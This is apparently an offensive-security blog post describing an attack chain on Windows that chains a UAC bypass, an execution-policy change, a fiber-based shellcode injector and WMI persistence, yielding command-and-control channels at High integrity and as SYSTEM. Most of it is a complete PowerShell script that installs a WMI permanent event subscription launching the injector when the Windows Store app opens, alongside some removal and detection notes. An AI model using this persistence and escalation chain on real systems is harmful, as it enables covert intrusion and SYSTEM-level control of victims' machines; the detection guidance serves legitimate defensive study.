CYBER MONGOL
2/8/2021

UAC Bypass - Fiber Injection - WMI Persistence

“Recorded Future expects further adoption of open source tools that have recently gained popularity, specifically Covenant, Octopus C2, Sliver, and Mythic." We have chained together several trending pieces of open source tradecraft around a UAC bypass that has had significant community momentum behind it, to show how a serious compromise can be assembled with very little modification to the published tools.
 
1. Modify the UAC bypass so that, instead of its stock payload, it launches WMIPers.cmd at High integrity.
 
2. WMIPers.cmd runs “PowerShell Set-ExecutionPolicy Unrestricted” to relax the execution policy. Note that the execution policy is not a security boundary; run elevated and without -Scope it rewrites the LocalMachine policy under HKLM, a persistent and easily audited change, and without -Force the cmdlet prompts for confirmation. Launching the script with “powershell -ExecutionPolicy Bypass -File ...” sidesteps the policy for that one process without touching the registry.
 
3. WMIPers.cmd then executes EventSubWMI.ps1 (High integrity is required to write to the root\subscription namespace), which creates a WMI permanent event subscription. The subscription fires when the Windows Store app is opened and runs a script that launches the binary Fibre.exe, a shellcode injector that executes its payload on a Windows fiber. Because the consumer is launched by the WMI provider host rather than by the creating user, it runs as SYSTEM.
 
4. WMIPers.cmd also executes Fibre.exe directly to establish an initial C2 channel at High integrity.
 
5. When the Windows Store app is opened, the subscription fires and a second channel comes back to the C2 in SYSTEM context.
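The following is an added example, not the post's EventSubWMI.ps1 or any code from the tools it names. It shows the WMI permanent event subscription from step 3 end to end in Windows PowerShell: creating the filter, consumer and binding; enumerating the namespace the way a defender would; and removing the subscription again, which is the cleanup the OpSec note asks for. The trigger condition (a Win32_Process creation event for WinStore.App.exe), the subscription name and the payload path are assumptions, not details taken from the post.

```powershell
# Added example, not the post's EventSubWMI.ps1. Creates, lists and removes a
# WMI permanent event subscription that launches a payload when the Windows
# Store app starts. Must run elevated: root\subscription is writable only at
# High integrity, while the consumer itself is launched by WMI's provider host
# as SYSTEM. Assumptions not stated in the post: the trigger is a Win32_Process
# creation event for WinStore.App.exe, and the name/path below are placeholders.

$Namespace    = 'root\subscription'
$SubName      = 'StoreAppMonitor'            # hypothetical subscription name
$PayloadPath  = 'C:\ProgramData\Fibre.exe'   # hypothetical location of the injector
$TriggerImage = 'WinStore.App.exe'           # assumed image name of the Store app

function New-StoreTriggeredSubscription {
    # Intrinsic events need a WITHIN polling interval; it also caps how long
    # after the Store process appears the consumer fires.
    $query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 " +
             "WHERE TargetInstance ISA 'Win32_Process' " +
             "AND TargetInstance.Name = '$TriggerImage'"

    $filter = Set-WmiInstance -Namespace $Namespace -Class __EventFilter -Arguments @{
        Name           = $SubName
        EventNamespace = 'root\cimv2'
        QueryLanguage  = 'WQL'
        Query          = $query
    }

    # CommandLineEventConsumer executes the template via WmiPrvSE, i.e. as SYSTEM.
    $consumer = Set-WmiInstance -Namespace $Namespace -Class CommandLineEventConsumer -Arguments @{
        Name                = $SubName
        CommandLineTemplate = $PayloadPath
    }

    # Nothing fires until the filter and consumer are bound together.
    Set-WmiInstance -Namespace $Namespace -Class __FilterToConsumerBinding -Arguments @{
        Filter   = $filter
        Consumer = $consumer
    }
}

function Get-PermanentSubscription {
    # Defender view: list every filter, consumer and binding in the namespace.
    # A clean host has very few (e.g. the SCM Event Log Consumer), so anything
    # else, and any consumer pointing at a user-writable path, deserves a look.
    foreach ($class in '__EventFilter', '__EventConsumer', '__FilterToConsumerBinding') {
        Get-WmiObject -Namespace $Namespace -Class $class |
            Select-Object @{ n = 'Class'; e = { $_.__CLASS } },
                          Name, Query, CommandLineTemplate, Filter, Consumer
    }
}

function Remove-StoreTriggeredSubscription {
    # Unbind first, then delete consumer and filter, so no half-wired objects remain.
    Get-WmiObject -Namespace $Namespace -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -like "*Name=`"$SubName`"*" } |
        Remove-WmiObject
    Get-WmiObject -Namespace $Namespace -Class CommandLineEventConsumer -Filter "Name='$SubName'" |
        Remove-WmiObject
    Get-WmiObject -Namespace $Namespace -Class __EventFilter -Filter "Name='$SubName'" |
        Remove-WmiObject
}

# Usage (from an elevated Windows PowerShell session):
#   New-StoreTriggeredSubscription      # install the subscription
#   Get-PermanentSubscription           # verify it, or hunt for others
#   Remove-StoreTriggeredSubscription   # tear it down after the engagement
```

The WMI cmdlets are used because this three-object pattern is how the technique is normally written; the CIM cmdlets (New-CimInstance with the same classes and namespace) work equally well. On the detection side, all three object creations are logged by Sysmon as Event IDs 19, 20 and 21, and Windows itself records new permanent consumer registrations as Event ID 5861 in Microsoft-Windows-WMI-Activity/Operational, so a subscription like this is loud unless those sources are not being collected.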
 
*Better OpSec is needed for a real engagement (cleanup of the subscription and dropped binaries, window visibility, etc.).*
 
#cyberthreatintelligence #infosec #cybersecurity #informationsecurity #threatintelligence #networksecurity #sec #security #tools #offensivesecurity #pentesting #redteam #blueteam

© COPYRIGHT 2015. ALL RIGHTS RESERVED.